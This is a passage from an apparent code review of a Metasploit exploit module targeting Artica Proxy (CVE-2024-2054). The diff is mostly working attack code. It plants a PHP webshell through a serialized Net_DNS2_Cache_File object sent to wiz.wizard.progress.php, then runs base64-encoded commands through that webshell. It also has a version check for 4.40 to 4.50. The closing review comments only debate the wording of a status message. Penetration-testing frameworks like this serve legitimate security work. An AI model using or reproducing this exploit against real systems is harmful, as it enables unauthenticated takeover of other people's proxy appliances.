modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb

```diff
@@ -0,0 +1,197 @@
+      'vars_post' => {
+        @post_param => payload
+      }
+    })
+  end
+
+  def execute_command(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    php_cmd_function = datastore['COMMAND']
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'wizard', @webshell_name),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_get' => {
+        @get_param => php_cmd_function
+      },
+      'vars_post' => {
+        @post_param => payload
+      }
+    })
+  end
+
+  def upload_webshell
+    # randomize file name if option WEBSHELL is not set
+    @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : "#{datastore['WEBSHELL']}.php")
+    @webshell_full_path = "/usr/share/artica-postfix/wizard/#{@webshell_name}"
+
+    @post_param = Rex::Text.rand_text_alphanumeric(1..8)
+    @get_param = Rex::Text.rand_text_alphanumeric(1..8)
+
+    # Upload webshell with PHP payload
+    if target['Type'] == :php
+      php_payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"
+    else
+      php_payload = "<?=$_GET[\'#{@get_param}\'](base64_decode($_POST[\'#{@post_param}\']));?>"
+    end
+
+    php_payload_len = php_payload.length
+    webshell_full_path_len = @webshell_full_path.length
+    final_payload = "O:19:\"Net_DNS2_Cache_File\":4:{s:10:\"cache_file\";s:#{webshell_full_path_len}:\"#{@webshell_full_path}\";s:16:\"cache_serializer\";s:4:\"json\";s:10:\"cache_size\";i:9999999999;s:10:\"cache_data\";a:1:{s:#{php_payload_len}:\"#{php_payload}\";a:2:{s:10:\"cache_date\";i:0;s:3:\"ttl\";i:9999999999;}}}"
+    final_payload_b64 = Base64.strict_encode64(final_payload)
+
+    return send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'wizard', 'wiz.wizard.progress.php'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_get' => {
+        'build-js' => final_payload_b64
+      }
+    })
+  end
+
+  def check
+    print_status("Checking if #{peer} can be exploited.")
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'ctype' => 'application/x-www-form-urlencoded',
+      'uri' => normalize_uri(target_uri.path)
+    })
+    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200
+
+    # Check if target is an Artica Proxy appliance
+    # Search for the Artica Version tag on the login page
+    html = res.get_html_document
+    unless html.blank?
+      version_match = html.text.match(/Artica.{1,2}\d\.\d\d/)
+      return CheckCode::Unknown('No Artica version found.') if version_match.nil?
+
+      version = version_match[0].split(' ')
+      if Rex::Version.new(version[1]) <= Rex::Version.new('4.50') && Rex::Version.new(version[1]) >= Rex::Version.new('4.40')
+        return CheckCode::Vulnerable("Artica version: #{version[1]}")
+      else
+        return CheckCode::Safe("Artica version: #{version[1]}")
```

Comment:
```suggestion
        return CheckCode::Safe("Artica version: #{version[1]} is not vulnerable")
```

Reply:
@bwatters-r7 
It already says "not vulnerable" in the first sentence. Why would we repeat this?

Reply:
Ooof; I forgot the auto-added context.  My bad.  You're right!